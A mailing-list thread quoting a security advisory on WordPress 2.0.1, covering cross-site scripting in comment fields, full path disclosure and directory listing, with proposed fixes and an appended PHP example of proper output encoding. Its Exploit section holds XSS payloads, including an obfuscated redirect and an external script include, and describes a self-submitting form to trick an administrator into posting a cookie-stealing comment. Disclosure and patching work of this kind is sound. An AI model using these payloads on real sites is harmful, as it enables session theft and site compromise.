Re: WordPress 2.0.1 Multiple Vulnerabilities
> Risk: Critical! Impact: XSS, Full Path Disclosure, Directory
> Listing
Here a critical bug is arbitrary command execution, account ownage, etc.;
an XSS isn't at all critical...
> <+ Full path disclosure & Directory listing +> When I discovered
> this bug, I reported it to some people before public disclosure, I
> was notified that this isn't new and I decided to look why they
> haven't patched this bug.
So it's not that critical: medium, but nothing critical...
Javor Ninov wrote:
> wp-content/ is also prone to directory listing
>
>
> Javor Ninov aka DrFrancky
>
> k4p0k4p0@xxxxxxxxxxx wrote:
>> /*
>> ---------------------------------------------------------------
>> [N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple
>> Vulnerabilities
>> ---------------------------------------------------------------
>> Program: WordPress 2.0
>> Homepage: http://www.wordpress.org
>> Vulnerable Versions: WordPress 2.0.1 & lower ones
>> Risk: Critical!
>> Impact: XSS, Full Path Disclosure, Directory Listing
>>
>> -> WordPress 2.0.1 Multiple Vulnerabilities <-
>> ---------------------------------------------------------------
>>
>> - Description
>> ---------------------------------------------------------------
>> WordPress is a state-of-the-art semantic personal publishing
>> platform with a focus on aesthetics, web standards, and
>> usability. What a mouthful. WordPress is both free and priceless
>> at the same time.
>>
>> - Tested
>> ---------------------------------------------------------------
>> Tested in localhost & many blogs
>>
>> - Bug
>> ---------------------------------------------------------------
>> The vendor was contacted about some other coding errors that are
>> not described here; the vendor was notified about these bugs when
>> this advisory was published.
>>
>> <+ Multiple XSS +> There're multiple XSS in `post comment':
>>
>> [1] The `name' variable is not filtered when it's assigned to `value'
>> on the `<input>' in the form when the comment is posted.
>> [2] The same happens as in [1] with the `website' variable.
>> [3] `comment': this variable is only filtered for " and ' chars, which
>> makes it possible to use < and >, thus permitting an attacker to inject
>> any HTML (or script) code that he/she wants but without any " or '
>> character; this only happens if the user that posts the comment is the
>> admin (any registered kind of `user').
>>
>> If you (or the victim) are an unregistered user, you can use " and ' in
>> your HTML/script injection using the `name' or `website' variables,
>> but if the victim is the admin or a registered user these 2
>> fields described above aren't available in the form, so you cannot
>> even give a value to them. The only remaining option is to use
>> the `comment' variable, but here we have the problem that we
>> cannot use " or ' in the injected HTML/script and we have to make the
>> admin post the comment (POST method).
>>
>> <+ Full path disclosure & Directory listing +> When I discovered
>> this bug, I reported it to some people before public disclosure,
>> I was notified that this isn't new and I decided to look why they
>> haven't patched this bug.
>>
>> As this bug isn't patched yet, I tried to find out why, and I found
>> something like this in their forum (I don't know if the person
>> that posted this was the admin, but it gives the explanation;
>> something like the following, it's not textual): `... these bugs
>> are caused by a badly configured .ini file; it's not a bug
>> generated by the script, so it cannot be accepted as a bug of
>> WordPress...'. This is not an acceptable answer; if you think it
>> is, then a bug caused because register_globals is Off is the .ini
>> file's fault and not the script's. They have to be kidding; if they
>> want to make good software, they have to go as far as the language
>> can to prevent all bugs.
>>
>> There're multiple files that don't check if they are being called
>> directly. This is a problem because they expect the functions
>> that the script is going to call to be declared. This kind
>> of bug is taken as a Low Risk bug, but it can help future
>> attacks.
>>
>> - Exploit
>> ---------------------------------------------------------------
>> -- Cross Site Scripting (XSS) PoC:
>>
>> [1] Post a comment with the following values (as unregistered user):
>> (No possible profit)
>>
>> Name   : "><script>alert("WordPress PoC from");</script>
>> Mail   : neosecurityteam@xxxxxxx
>> Website: "><script>alert("[N]eo[S]ecurity[T]eam www.neosecurityteam.net");</script>
>> Comment: www.neosecurityteam.net/foro/
>>
>> The injected HTML code only affects the user that posted it, not
>> others.
>>
>> [2] This way is more interesting and useful. In this case the
>> injected HTML will stay in the board, affecting each person who
>> sees it. But we have two problems:
>> [I ]- This comment must be posted by the admin.
>> [II]- We can only use the `comment' field, because the admin form
>> to make the comment doesn't need the `name' or `website'. Also the
>> injected code cannot have any " or ' chars.
>>
>> Here are my solutions:
>> [I ]- We cannot give the admin a `malicious' URL to steal the
>> cookie because it isn't via GET, it's via POST. So the solution is
>> to make a copy of the real form and set the default values of the
>> corresponding field (`comment') to do the stealing. Also make the
>> form submit itself when the page loads. Thus, we give the admin the
>> URL of this form and he/she will post the comment with the values
>> we set before. :)
>> [II]- We can only use this field to make the injection; the `big'
>> problem is that we cannot use " or ' chars, which means that
>> something like window.location = "http://www.google.com.uy"; won't
>> work.
>>
>> Here are some real examples:
>>
>> - <script>alert(document.cookie)</script>
>> - <script>alert(String.fromCharCode(80,111,67,32,111,102,32,87,111,114,100,80,114,101,115,115,32,98,121,32,75,52,80,48,32,102,114,111,109,32,78,83,84))</script>
>> - <script src=http://www.neosecurityteam.net></script>
>> - <script>document.location = String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,110,101,111,115,101,99,117,114,105,116,121,116,101,97,109,46,110,101,116)</script>
>>
>> As you can see this bug is exploitable; it's only a matter of knowing
>> a bit deeper how to do XSS under some conditions. There're more
>> possibilities than described above; investigate yourself.
>>
>> -- Full path disclosure & Directory Listing
>>
>> Directory Listing:
>> www.victim.com/wordpress/wp-includes/
>>
>> Full path disclosure:
>> www.victim.com/wordpress/wp-includes/default-filters.php
>> www.victim.com/wordpress/wp-includes/template-loader.php
>> www.victim.com/wordpress/wp-admin/edit-form-advanced.php
>> www.victim.com/wordpress/wp-admin/edit-form-comment.php
>> www.victim.com/wordpress/wp-includes/rss-functions.php
>> www.victim.com/wordpress/wp-admin/admin-functions.php
>> www.victim.com/wordpress/wp-admin/edit-link-form.php
>> www.victim.com/wordpress/wp-admin/edit-page-form.php
>> www.victim.com/wordpress/wp-admin/admin-footer.php
>> www.victim.com/wordpress/wp-admin/menu-header.php
>> www.victim.com/wordpress/wp-includes/locale.php
>> www.victim.com/wordpress/wp-admin/edit-form.php
>> www.victim.com/wordpress/wp-includes/wp-db.php
>> www.victim.com/wordpress/wp-includes/kses.php
>> www.victim.com/wordpress/wp-includes/vars.php
>> www.victim.com/wordpress/wp-admin/menu.php
>> www.victim.com/wordpress/wp-settings.php
>>
>> - Solutions
>> ---------------------------------------------------------------
>> <+ Cross Site Scripting (XSS) +> Change lines ~21 of
>> 'wp-comments-post.php' to:
>>
>> $comment_author       = htmlentities(trim($_POST['author']));
>> $comment_author_email = htmlentities(trim($_POST['email']));
>> $comment_author_url   = htmlentities(trim($_POST['url']));
>> $comment_content      = htmlentities(trim($_POST['comment']));
>>
>> <+ Full Path Disclosure & Directory Listing +> In the first line
>> of each vulnerable file you should write:
>>
>> if (eregi('name_of_the_file.php', $_SERVER['PHP_SELF'])) die('You are not allowed to see this page directly');
>>
>> - References
>> ---------------------------------------------------------------
>> http://NeoSecurityTeam.net/advisories/Advisory-17.txt
>>
>> - Credits
>> --------------------------------------------------------------
>> Discovered by K4P0-> k4p0k4p0[at]hotmail[dot]com
>>
>> [N]eo [S]ecurity [T]eam [NST]® - http://NeoSecurityTeam.net/
>>
>> Irc.InfoGroup.cl #neosecurityteam Questions? (Eng | Spa) ->
>> http://NeoSecurityTeam.net/foro/
>>
>> - Greets
>> ---------------------------------------------------------------
>> Paisterist HaCkZaTaN Link Daemon21 erg0t NST Community!
>>
>> */
>
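An added PHP example, not code from the advisory or from WordPress, that models the quote-only filter the advisory describes for the `comment' field next to proper HTML-entity encoding, and shows the include-guard idiom in place of the eregi()/PHP_SELF check proposed in the Solutions section. The sample payload is constructed and the function names are hypothetical.

```php
<?php
// Added example, not code from the advisory or from WordPress.
// Contrasts the quote-only filter the advisory describes for the
// `comment' field with HTML-entity encoding, and shows an include
// guard in place of the eregi()/PHP_SELF check.

// Models the broken filter: only " and ' are removed, so a <script>
// tag passes through untouched (this is what the advisory exploits).
function filter_quotes_only(string $s): string
{
    return str_replace(['"', "'"], '', $s);
}

// Hardened output encoding for an HTML context. ENT_QUOTES matters:
// before PHP 8.1, htmlentities() without it leaves the single quote
// alone, which still breaks out of a value='...' attribute.
function encode_for_html(string $s): string
{
    return htmlentities(trim($s), ENT_QUOTES, 'UTF-8');
}

// Include guard: wp-settings.php defines ABSPATH during a normal
// bootstrap, so a file requested directly can bail out without
// relying on PHP_SELF (which carries attacker-supplied PATH_INFO)
// or on eregi(), which was removed in PHP 7.
function is_direct_request(): bool
{
    return !defined('ABSPATH');
}

// Constructed sample input shaped like the advisory's PoC.
$payload = '"><script>alert(document.cookie)</script>';

// Quote stripping leaves the tag itself intact and executable.
echo filter_quotes_only($payload), PHP_EOL;

// Encoding turns <, >, " and ' into entities, so the same bytes are
// inert both inside an attribute and as element content.
echo encode_for_html($payload), PHP_EOL;

// Safe to interpolate into the comment form's <input value="...">.
echo '<input name="author" value="' . encode_for_html($payload) . '">', PHP_EOL;

// Run standalone, ABSPATH is undefined, so the guard would fire;
// an include-only file would call die() at this point.
var_dump(is_direct_request());
```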